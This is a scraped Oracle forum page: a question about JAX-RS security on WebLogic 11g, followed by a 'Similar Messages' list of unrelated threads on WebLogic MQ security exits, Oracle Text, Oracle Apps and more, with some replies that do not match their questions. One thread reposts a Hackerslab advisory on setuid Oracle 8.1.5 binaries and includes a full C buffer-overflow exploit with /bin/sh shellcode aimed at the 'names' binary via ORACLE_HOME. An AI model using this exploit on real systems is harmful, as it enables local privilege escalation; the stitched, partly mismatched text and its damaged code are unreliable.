JAX-RS security: exiting/applicable Oracle docs?
Hi,
I intend to create some RESTful APIs for a product using Jersey JAX-RS RI Version 1.9 deployed on Oracle WLS 11g (10.3.6) as described in Programming RESTful Web Services - 11g Release 1 (10.3.6) but there is no security documentation available for Oracle WLS 11g (10.3.6). But I've found some for Oracle WLS 12c (12.1.1) at web page Securing RESTful Web Services - 12c Release 1 (12.1.1).
My question is: are the security mechanisms described in Oracle WLS 12c (12.1.1) web page Securing RESTful Web Services - 12c Release 1 (12.1.1) applicable also for Oracle WLS 11g (10.3.6)?
Also where can I find potential issues around JAX-RS/security/Jersey context with Oracle weblogic server?
Thanks in advance,
Dim
Hello,
A couple of options:
1. Create a Weblogic Web Service Project with 12c Runtime.
a. File->New->Web Service Project
b. Select your 12c runtime
-You should have a project with the JAX-RS on the java build library path.
2. Create a standard J2ee Project ie: Web Project
a. Create A Dynamic Web Project
b. Select your 12c runtime
c. Rt Click the Project->Properties->Java Build Path->Libraries->Add External JARs, then navigate and select "WLS 12c Dir"\modules\com.sun.jersey.core_"version".jar
This should allow the resolution of the javax.ws.rs.* annotations.
Additionally, you may need to rt. click the Deployment Descriptor of your project and select Generate Deployment Descriptor Stub. Subsequently add the following:
<servlet>
<servlet-name>JAX-RS Application</servlet-name>
<servlet-class>com.sun.jersey.spi.container.servlet.ServletContainer</servlet-class>
<load-on-startup>1</load-on-startup>
</servlet>
<servlet-mapping>
<servlet-name>JAX-RS Application</servlet-name>
<url-pattern>*</url-pattern>
</servlet-mapping>
Similar Messages
-
Hi,
i have been trying to setup security, ws addressing for a jax ws service. I am not able to find a suitable example or documentation. Any pointers? The weblogic documentation are mostly for jax rpc.
Thanks in advance,
-SAn example can be found here: http://docs.oracle.com/cd/E21764_01/web.1111/e13713/message.htm#CDEBIJEJ
which is part of the document securing web services (http://docs.oracle.com/cd/E21764_01/web.1111/e13713/toc.htm) -
Security when using oracle text
Hello,
We would like to use Oracle text functionality on Oracle 10 but the System Admin told us that Oracle is accessing the filesystem with the user account who launched the oracle instance.
He told us that this is a security problem : giving oracle password gives access to the file system.
Is that true and is there a solution to make oracle connect to the filesystem with another linux user account ?
Thanks a lot !raford wrote:
This only applies when you use the FILE_DATASTORE to index documents on disk, rather than in the file system.
You can restrict access to this feature by only allowing users having a specific role to use it - see
http://download.oracle.com/docs/cd/B28359_01/text.111/b28304/cdatadic.htm#BHCBIFEA
(NB. this is in the 11g documentation - I can't find it in the 10g manual but the functionality is the same).
It's the database process itself which accesses the files, so it will always access them as the owner of the database process, there's no way to change that.What do you mean when you said " FILE_DATASTORE to index documents on disk, rather than in the file system" ? -
Security Evaluation of Oracle Application Server
Are there any published documents on security evaluation of Oracle Application Server?
Is it secure as a tool against some attacks, for example, are following vulnerabilities when applicable to the server dealt with or should be handled by application? :
failure to restrict url access,
broken authentication and session management
insecure cryptographic storage,
injection flaws
failure to restrict directory browsing
Are there available document that we can refer to on these issues?
Regards
FarbodThank you again.
Can you advise on this part of my message also?
"Also I see in oracle recommended architectures that there is a firewall between each http server and application server. Does the built in OHS in OAS provide the firewall? or I need to install another firewall?"
I am going to explain it but I think it is completely inconsistent with the thread title which I got some of my answers in, so let me start a new thread here:
Application Server Recommended Deployment Architectures, How to?
Thanks for your useful inputs.
Best Regards,
Farbod -
Security vulnerability in Oracle 8.1.5
The following email was forwarded to me about possible security vulnerabilities.
I am looking for verification from both Oracle and the user comunity.
================================================================================
[ Hackerslab bug_paper ] Linux ORACLE 8.1.5 vulnerability
================================================================================
File : Oracle 8.1.5
SYSTEM : LINUX
Tested by RedHat Linux 6.2
INFO :
There are two security vulnerability in Oracle.
1. buffer overflow
It is possible to create a buffer overflow vulnerability using "ORACLE_HOME",
one of the environmental value of Oracle.
Oracle applications that are vulnerable to buffer overflow are as follow :
- names
- namesctl
- onrsd
- osslogin
- tnslsnr
- tnsping
- trcasst
- trcroute
Thease applications allow an attacker to excute a buffer overflow exploit.
2. Log-files created
When a user excutes one of Oracle applications such as names, oracle or tnslsnr,
following log files are created.
names
======
-rw-rw-r-- 1 oracle dba 0 Oct 20 01:45 ckpcch.ora
-rw-rw-r-- 1 oracle dba 428 Oct 20 01:45 ckpreg.ora
-rw-rw-r-- 1 oracle dba 950 Oct 20 01:45 names.log
oracle
======
-rw-rw---- 1 oracle dba 616 Oct 20 05:14 ora_[running pid].trc
tnslsnr
=======
-rw-rw-r-- 1 oracle dba 2182176 Oct 20 2000 listener.log
SOLUTION
Contact your vendor for a patch or close setuid permission.
# su - oracle
$ cd /oracle_8.1.5_install_directory/bin
$ chmod a-s names namesctl onrsd osslogin tnslsnr tnsping trcasst trcroute
==-------------------------------------------------------------------------------==
* ** ** * [email protected] [yong-jun, kim]
* ** ** * [ [URL=http://www.hackerslab.org]http://www.hackerslab.org ]
******** HACKERSLAB (C) since 1999
==-------------------------------------------------------------------------------==
Oracle 8.1.5 exploit
-by loveyou
offset value : -500 ~ +500
#include <stdio.h>
#include <stdlib.h>
#define BUFFER 800
#define NOP 0x90
#define PATH "/hackerslab/loveyou/oracle/8.1.5/bin/names"
char shellcode[] =
/* - K2 - */
/* main: */
"\xeb\x1d" /* jmp callz */
/* start: */
"\x5e" /* popl %esi */
"\x29\xc0" /* subl %eax, %eax */
"\x88\x46\x07" /* movb %al, 0x07(%esi) */
"\x89\x46\x0c" /* movl %eax, 0x0c(%esi) */
"\x89\x76\x08" /* movl %esi, 0x08(%esi) */
"\xb0\x0b" /* movb $0x0b, %al */
"\x87\xf3" /* xchgl %esi, %ebx */
"\x8d\x4b\x08" /* leal 0x08(%ebx), %ecx */
"\x8d\x53\x0c" /* leal 0x0c(%ebx), %edx */
"\xcd\x80" /* int $0x80 */
"\x29\xc0" /* subl %eax, %eax */
"\x40" /* incl %eax */
"\xcd\x80" /* int $0x80 */
/* callz: */
"\xe8\xde\xff\xff\xff" /* call start */
"/bin/sh";
unsigned long getesp(void)
__asm__("movl %esp,%eax");
int main(int argc, char *argv[])
char buff, ptr,binary[120];
long *addr_ptr, addr;
int bsize=BUFFER;
int i,offset;
offset = 0 ;
if ( argc > 1 ) offset = atoi(argv[1]);
buff = malloc(bsize);
addr = getesp() - 5933 - offset;
ptr = buff;
addr_ptr = (long *) ptr;
for (i = 0; i < bsize; i+=4)
*(addr_ptr++) = addr;
memset(buff,bsize/2,NOP);
ptr = buff + ((bsize/2) - (strlen(shellcode)/2));
for (i = 0; i < strlen(shellcode); i++)
*(ptr++) = shellcode;
buff[bsize - 1] = '\0';
setenv("ORACLE_HOME",buff,1);
printf("[ offset:%d buffer=%d ret:0x%x ]\n",
offset,strlen(buff),addr);
system(PATH);
nullHi Peter,
I was told that Oracle8 and Oracle8i Parallel Server on IBM
RS/6000 AIX comes with its own Lock Manager and this LM does not
rely on the Cluster Lock Manager (cllockd) of HACMP for AIX, as
Oracle7 Parallel Server on normal (non-SP) RS/6000 does.
(Oracle7 Parallel Server on RS/6000 SP didn't use the cllockd of
HACMP but came with a special LM.)
Cluster-wide Filesystems are not used for OPS on Unix, as far as
I know Unix (AIX, Solaris). All Data-, Log- and Control-Files
must reside on concurrently (!) accessible Raw-Devices (e.g. Raw
Logical Volumes on AIX).
So I guess it should be possible for Oracle to port OPS to Linux.
No special Cluster-Services would be needed for OPS on Linux,
just a shared SCSI-bus (e.g.) and a fast interconnect (e.g.
100BaseT).
Peter Sechser (guest) wrote:
: Dave,
: Parallel Server needs some cluster services in order to
: communicate between several nodes. So, the operating system has
: to offer things like inter-node communication services,
: cluster-wide lock communication services and a clusterwide
: filesystem. I'm not quite sure, to what degree Linux
offers/will
: offer these services.
: Peter
null -
WLS 8.1 MDBs, Websphere MQ QMs and Security Exits....
Hi:
I am testing an MDB that is listening on a Websphere MQ 5.3 Queue. For security,
I have secured the Server Connection Channel of the Queue Manager (to which the
Queue belongs to) with a Security Exit.
Using the Foreign JMS Servers section in the Admin console, I defined a 'Foreign
JMS Connection Factory' that has the userid & password that is supposed to be
passed to Websphere MQ.
When the MDB comes up, it throws a SecurityException. In the background, the Security
Exit log indicates that the MDB tried to make multiple connections to the Server
Channel. The Deployment descriptor has the 'MAX BEANS IN FREE POOL' set to 1.
My issues are:
1. When the MDB comes up the Server Connection Channel shows multiple connections.
I know there is only one MDB, so I am curious why there would be multiple connections
to the same Channel.
2. The Security Exit log shows that the userid and passord was passed on to MQ
certain times and other times it was not. The net result is the Security Exit
rejected the MDB Connections (when the userid and pwd was blanks) and the Bean
did not come up properly.
I am concerned with Issue 2. Because, all I am able to control is giving the userid
and pwd in the Foreign JMS Server section. WLS 8.1 is supposed to pass on the
credentials properly to MQ when needed. Is WLS 8.1 NOT doing what is expected
or am I missing something?
What is the procedure to deploy a WLS 81 MDB that is listening on a queue whose
QM is secured by an MQ Security Exit.
Please help!
When you deploy any EJB or servlet that uses the "resource-reference", the
container (after a short delay) tries to make a connection to get the
XAResource for that JMS provider. It then registers that with JTA. That way,
JTA can perform transaction recovery on the JMS provider sooner rather than
later. (If we waited to register the MQSeries resource with JTA until you
used it, then if MQ had prepared transactions, they wouldn't be resolved
until you actually tried to send a message.)
As for the "multiple connections", I believe that the MQSeries JMS library
uses a single MQ "connection handle" for every JMS session. (That's because
MQ connection handles aren't thread-safe.) In our pool of the JMS Session
objects, we open more than one session initially, so that might be why
you're seeing multiple connections.
You can monitor the pooling of the JMS sessions using the console. Click on
your server in the "servers" tab in the left-hand tree view, then on
"Monitoring", then on "JMS", and then on "Monitor Pooled JMS Connections".
greg
"Sridhar Krishnaswamy" <[email protected]> wrote in message
news:[email protected]...
>
> I tried the steps you have mentioned. But the userid still does not come
across
> to MQSeries. So, I will follow up with Support. The MDB is passing on the
credentials
> fine when using the same QCF to put the messages to.
>
> On the issue of multiple connections, you are right. The connections are
because
> of the resource-ref entries. Though I am not sure why the MDB is actually
trying
> to establish multiple connections for every resource-ref entry (because
the pooling
> mechanism kicks in?). Also, in my design, some of the resource-ref are
actually
> 'stand-bys' to be used only if the MDB fails to put the message using the
primary
> resource-ref entry. I would have thought that the physical connections
will actually
> be made when the call for looking up the QCF is made by the bean or
createQueueConnection
> called. Just for my knowledge, I would like to know why the Container is
establishing
> the connections upfront.
>
> As always, I really appreciate your help, Greg.
>
> Thanks,
> Sridhar
>
> "Greg Brail" <[email protected]> wrote:
> >At the moment, the username and password used to receive messages come
> >from
> >a differenct place, and not from the "Foreign JMS Connection Factory"
> >screen. (Yes, I realize that this is confusing.) To do what you want,
> >you
> >need to define a "credential mapping":
> >
> >-- Create a WebLogic Server user using the "security" section of the
> >console, and assign the password that you will need to connect to MQ.
> >
> >-- Right-click on your MDB in the left-hand tree view, and select "Define
> >Roles and Policies for Individual Beans"
> >
> >-- You should see a list of MDBs on the screen. Click on "define
credential
> >mapping". (I forget the exact wording, but it's something like that.)
> >
> >-- On this screen, you enter the MQSeries username that you'll need to
> >set,
> >and the WebLogic user that you created in the first step. It then uses
> >the
> >password from this WebLogic username.
> >
> >If you have trouble with this, please call support. I know that some
> >people
> >have had trouble with this particular feature.
> >
> >I'm not sure about the multiple connections. Is it possible that you
> >have a
> >"resource-reference" declared for MQ somewhere?
> >
> > greg
> >
> >"Sridhar Krishnaswamy" <[email protected]> wrote in message
> >news:[email protected]...
> >>
> >> Hi:
> >> I am testing an MDB that is listening on a Websphere MQ 5.3 Queue.
> >For
> >security,
> >> I have secured the Server Connection Channel of the Queue Manager (to
> >which the
> >> Queue belongs to) with a Security Exit.
> >>
> >> Using the Foreign JMS Servers section in the Admin console, I defined
> >a
> >'Foreign
> >> JMS Connection Factory' that has the userid & password that is supposed
> >to
> >be
> >> passed to Websphere MQ.
> >>
> >> When the MDB comes up, it throws a SecurityException. In the
background,
> >the Security
> >> Exit log indicates that the MDB tried to make multiple connections
> >to the
> >Server
> >> Channel. The Deployment descriptor has the 'MAX BEANS IN FREE POOL'
> >set to
> >1.
> >> My issues are:
> >>
> >> 1. When the MDB comes up the Server Connection Channel shows multiple
> >connections.
> >> I know there is only one MDB, so I am curious why there would be
multiple
> >connections
> >> to the same Channel.
> >> 2. The Security Exit log shows that the userid and passord was passed
> >on
> >to MQ
> >> certain times and other times it was not. The net result is the
Security
> >Exit
> >> rejected the MDB Connections (when the userid and pwd was blanks) and
> >the
> >Bean
> >> did not come up properly.
> >>
> >> I am concerned with Issue 2. Because, all I am able to control is
giving
> >the userid
> >> and pwd in the Foreign JMS Server section. WLS 8.1 is supposed to pass
> >on
> >the
> >> credentials properly to MQ when needed. Is WLS 8.1 NOT doing what is
> >expected
> >> or am I missing something?
> >>
> >> What is the procedure to deploy a WLS 81 MDB that is listening on a
> >queue
> >whose
> >> QM is secured by an MQ Security Exit.
> >>
> >> Please help!
> >
> >
>
-
Small office (5 users) - Accounting - wanting to secure ingress/egress of docs..I haven't seen this answered for an office of this size.I have the need for a relatively cheap software package or guidelines (I'll still keep the search active) for how to block, or at least alert, of sensitive data from leaving the company.I know that I'll have challenges on:1. Blocking certain attachment types from being sent, via webmail, web site attach, email. I am sure someone's written a how-to but I'm darned if I can find it. Suggestions?
2. Blocking certain programs from running (whitelist/blacklist) - not really wanting to be deep in their pockets every time the application is updated, so not sure if a hash list would be a good idea based on a GPO security policy, or if black/white lists are best?3. Web blocking - I'm thinking I am wanting to...
This topic first appeared in the Spiceworks CommunityHi guys,First, I've done a lot of searching on the weband read a few different threads on Spiceworks regarding HIPPA compliance and encrypting hard drives.Specifically these two threads:http://community.spiceworks.com/topic/596465-encryption-for-hipaa-compliancehttp://community.spiceworks.com/topic/320759-how-are-you-handling-hipaa-s-latest-data-at-rest-rulesSo I have a new client that's in the medical field. He has a server that's about two-three years old that looks as ifit was built with budget at the forefront. It's a whitebox with an Asus P8H77-v motherboard, 16 GB of ram, an i3 processor& two 1 TBSATA drives using raid 1 right off the motherboard. The roles it has: DNS/DHCP/File server/AD. Side note - eventhough it's been setup for AD none of the computers are on the domain.Their EMR software is Tracknet & the datais being stored...
-
Multi security groups in Oracle apps hrms
Hi All,
Could you please let us know how to enable or disable multi security groups in Oracle Apps hrms?
Thnaks,
AnilIf you have access to Oracle Help-on-line check it there
<BLOCKQUOTE><font size="1" face="Verdana, Arial">quote:</font><HR>Originally posted by Amit Das ([email protected]):
Can you please tell me of any document/book etc which describes the security features in Oracle Apps specially on Oracle financials. <HR></BLOCKQUOTE>
null -
Security features in Oracle Apps (Oracle Financuals)
Can you please tell me of any document/book etc which describes the security features in Oracle Apps specially on Oracle financials.
If you have access to Oracle Help-on-line check it there
<BLOCKQUOTE><font size="1" face="Verdana, Arial">quote:</font><HR>Originally posted by Amit Das ([email protected]):
Can you please tell me of any document/book etc which describes the security features in Oracle Apps specially on Oracle financials. <HR></BLOCKQUOTE>
null -
Looking for Oracle Doc on RAC...
Hi,
I am looking for an Oracle doc (Metalink or whatever), that will give me Oracle's recommendations on how to best configure a 4 Node RAC Env on RHLE4. We are running mainly a data warehouse shop here and we are trying to best configure our Network for this...things like NIC cards (1 gb 2, 2gb, etc, etc), InterConnect, etc, etc...anything would help us.
Is there such a doc out there?http://www.grumpy-dba.com
http://blogs.oracle.com/AlejandroVargas/gems/RACDetailDesignandBestPracti.pdf
Good and useful stuff in the blog.
Ravi -
Security Measures of Oracle e-business Suite
Hi ,
Can anyone please provide any link/material on Security Measures of Oracle e-business Suite.
I need this stuff pretty urgently.
Thanks in advance,
Sandy...Best Practices for Securing Oracle E-Business Suite (Metalink Note 189367.1)
-
Security issues on Oracle Database (10g)
Hello,
I need to make a security manual for Oracle (10g) databases. This has to be some sort of checklist to assure a database is secure. I am thinking of encryption, least privilege, limit access, etc etc. I am sure this has been done before. Please help me with links to documents about this.
Kind regards,
Rob Schenk(Funny thing - Oracle has hired people to write documentation and has placed it online for anyone to read.)
You just might find what you need in the "Security Guide" at http://www.oracle.com/pls/db102/portal.portal_db?selected=1
If documentation is not sufficient, I recommend http://www.amazon.com/gp/product/0974372749/ -
Security Rules in Oracle Financials GL
I have defined security rules in Oracle Financials GL version 11.0.3. The security rules can be applied in form level.
e.g For account inquiry, only limited accounts can be viewed.
But for all reports in Oracle Financials, it's not restricted by the rules. How can I applied those rules in reports as well?Unfortunately data in standard and bespoke oracle reports is not restricted by security rules by default.
Security can be enabled for FSG reports.
If you need security rules to be applied to standard reports, I am afraid, you need customization. -
Viewing Oracle docs on a Kindle?
I'm thinking of buying a Kindle, solely to view technical PDFs.
Has anyone viewed the Oracle doc PDFs (e.g., from tahiti.oracle.com) on a Kindle? I understrand PDF viewability is kind of hit-or-miss.I owned a kindle and read Oracle documents on mine before I sold it and yes the readiblity was great. My only problem was when reading text books. I realized that reading text books the old way was better for me than on an e-reader. So I sold mine. It was not because of look and feel of the document, but I could not just nevigate faster making references, checking souces back and forward.
Edited by: Albert Zaza on Nov 29, 2010 12:02 PM -
Applying security patch to Oracle 10G on Linux
Hello,
I'm new to Oracle DBA world, need to apply security patch to Oracle 10G on Linux server, any tips and notes would be appreciated.
thanks
SamManish,
1. I have to upgrade the database version from 10.2.0.2 to 10.2.0.4 on Linux, Is there any proper documentation which will help me out?Please refer to the following document.
Note: 454750.1 - Oracle Apps Release 12 with Oracle Database 10.2.0 interoperability notes
https://metalink.oracle.com/metalink/plsql/ml2_documents.showDocument?p_database_id=NOT&p_id=454750.1
2. What are the types of oracle database patches? what is the proper procedure to apply those kind of patches to Oracle 10g on Linux?
Most of the patches in this upgrade are database patches (which should be applied using opatch). The main upgrade patch (Patch 6810189 - 10.2.0.4 patch set) should be applied using Oracle Universal Installer (runInstaller).
Always follow the steps in the patch README file before applying any patch.
Regards,
Hussein
Maybe you are looking for
-
If i backed up my iPhotos on an external hard drive can i delete them off my mac?
I recently backed up my Macbook pro on to an external hard drive. I was wodnering if i could delete my photos from my iphoto library to save space, and if so can i then get them back on my computer from my external hard drive?
-
How to populate Global Container
Hi, We have an output structure of the form- <Record> occurence 1-n <MSGFN>..</MSGFN> occurence 1-1 <MTART>..</MTART> occurence 1-1 <VOLUM>..</VOLUM> occurence 1-1 </Record> I have w
-
Can any one please tell me:- 1- The T-Code to find out the changes made in standard SAP programs by consultants who were on this project before so that i get the exact count of how many programs have been changed? 2-How do i find out the number of
-
Printing only an extraction of a canvas
Hi! I have a poblem printing only an extraction of a canvas which itself contains some boxes with labels, etc... Canvas (scrollRect = new Rectangle(.....)) +---Box | +---Label | +---Label +---Box To achiev my goal I set the scrollRect to my desired c
-
Guidance needed for KM and Collaboration
Hi All, I am new to the EP platform.I would be grateful if anybody can help me out with these questions: 1)When I have EP 6.0 installed,does that mean 'Collaboration' capabilities under 'people Integration' are also available to me? 2)If yes,how and